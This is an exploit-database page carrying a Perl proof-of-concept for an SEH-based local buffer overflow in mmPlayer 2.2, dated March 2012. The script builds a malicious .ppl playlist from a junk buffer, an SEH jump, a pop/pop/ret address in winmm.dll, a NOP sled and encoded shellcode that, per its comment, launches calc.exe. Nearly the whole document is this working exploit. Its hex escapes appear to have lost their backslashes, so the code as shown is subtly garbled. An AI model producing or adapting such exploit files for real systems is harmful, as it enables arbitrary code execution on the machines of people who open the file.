[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : mmPlayer 2.2 (.ppl) Local Buffer Overflow Exploit (SEH)
# Published : 2012-03-23
# Author :
# Previous Title : glibc LD_AUDIT arbitrary DSO load Privilege Escalation
# Next Title : Xorg 1.4 to 1.11.2 File Permission Change PoC


#!/usr/bin/perl
# Title: mmPlayer 2.2 (.ppl) Local Buffer Overflow Exploit (SEH)
# Date: 23.03.2012
# Author: RjRjh Hack3r
# Software Link: http://www.brnameg.com/download.php?id=3859
# Tested on: Windows XP SP2 (EN)

my $file= "RjRjh.ppl";
my $junk= "x41" x 4090;
my $next_seh= "xEBx06x90x90";
my $seh= "x23xC0xB4x76"; # pop/pop/ret 0x76B4C023 (winmm.dll) EBX
my $nop = "x90" x 20;

# calc.exe
my $buf =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x30x42x30x42x30x4bx48x45x34x4ex53x4bx48x4ex47".
"x45x50x4ax37x41x50x4fx4ex4bx58x4fx34x4ax41x4bx58".
"x4fx35x42x32x41x30x4bx4ex49x34x4bx38x46x33x4bx38".
"x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x48x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx33x46x55x46x42x46x30x45x47x45x4ex4bx58".
"x4fx55x46x32x41x30x4bx4ex48x46x4bx58x4ex30x4bx54".
"x4bx38x4fx45x4ex41x41x30x4bx4ex4bx58x4ex41x4bx48".
"x41x30x4bx4ex49x38x4ex55x46x42x46x50x43x4cx41x43".
"x42x4cx46x56x4bx58x42x54x42x53x45x48x42x4cx4ax47".
"x4ex30x4bx48x42x34x4ex30x4bx38x42x57x4ex51x4dx4a".
"x4bx58x4ax46x4ax30x4bx4ex49x50x4bx58x42x38x42x4b".
"x42x30x42x30x42x30x4bx38x4ax46x4ex43x4fx45x41x53".
"x48x4fx42x56x48x45x49x38x4ax4fx43x58x42x4cx4bx37".
"x42x45x4ax56x42x4fx4cx38x46x50x4fx35x4ax56x4ax59".
"x50x4fx4cx48x50x50x47x35x4fx4fx47x4ex43x46x41x36".
"x4ex36x43x36x42x50x5a";
open($File,">$file");
print $File $junk.$next_seh.$seh.$nop.$buf;
close($File);